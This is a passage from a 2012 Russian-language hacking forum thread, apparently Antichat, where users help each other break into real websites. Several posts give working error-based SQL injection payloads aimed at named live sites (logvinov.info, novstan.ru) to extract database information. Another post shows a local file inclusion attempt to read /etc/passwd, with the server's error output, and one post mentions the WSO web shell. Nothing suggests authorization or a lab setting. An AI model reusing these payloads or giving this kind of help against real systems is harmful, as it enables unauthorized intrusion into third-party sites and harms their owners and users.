
02.07.2012, 19:26
|
|
Новичок
Регистрация: 02.07.2012
Сообщений: 1
С нами:
7296086
Репутация:
0
|
|
Сообщение от None
Вроде в WSO есть... не?
Но работает он только в версии с "suid".
|
|
|

03.07.2012, 00:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Del msg
|
|
|

03.07.2012, 00:32
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
Del msg
|
|
|

03.07.2012, 00:41
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
Сообщение от Zed0x
Эмммм, в верху страницы на пол страницы)))
сори у меня чет в мозиле не было хз почему ))
а в хроме есть
|
|
|

03.07.2012, 11:16
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от Zed0x
Помогите подобрать колонки. При постановки ковычки вылизает ошибка базу, но почему то не получается:
http://logvinov.info/about/0/0/0/1'or(1,2)=(select*from(select(name_const(version() ,1)),name_const(version(),1))a)and(1)='1
|
|
|

03.07.2012, 11:36
|
|
Новичок
Регистрация: 01.07.2012
Сообщений: 22
С нами:
7297526
Репутация:
0
|
|
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
|
|
|

03.07.2012, 14:02
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами:
8957186
Репутация:
796
|
|
Сообщение от Rootz
ребят, извиняюсь за жутко странный вопрос, но не мог бы кто объяснить, как искать sql-injection в ручную? ) подробных faq не видел, желательно человек чтобы ) если согласен кто помочь начинающему, отпишите пожалуйста в пм свою icq\jabber
Основы тут. Далее сам сообразишь, нужны начальные знания синтаксиса СУБД.
|
|
|

03.07.2012, 14:37
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Нашел на неком сайте LFI
Код:
http://******.ru/book_php.php?id=adminpidaras.php
Пытаюсь крутить
Код:
http://******.ru/book_php.php?id=../../../../../../../../../../../../../../../../../../../etc/passwd
Сообщение от None
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/******/data:.) in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /var/www/******/data/www/******.ru/book_php.php on line 387 Warning: include(): Failed opening 'books/PHP/../../../../../../../../../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/share/pear:/usr/share/php') in /var/www/******/data/www/******.ru/book_php.php on line 387
Поставляю %00, и все-равно ошибка.
Подскажите что я делаю не так?
|
|
|

03.07.2012, 14:54
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Сообщение от None
Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s)
нулл-байт тут не при чём. В самом конфиге апача прописано куда можно ходить.
|
|
|

03.07.2012, 19:08
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от Nightmarе
Не могу раскрутить никак:
http://www.novstan.ru/search/?str=ass'
Как мне кажется, там запрос типа select * from search where ass like '%$_GET[str]%'
Но никак не получается текущий запрос перекрыть, чтобы свой выполнить, делал так:
ass'), ass%'), ass%')) и так далее, но видимо кардинально не то делаю, просьба помочь кто может.
Код:
http://www.novstan.ru/search/?str=%')or(1)group%2F%2A%2A%2Fby(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))%23
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|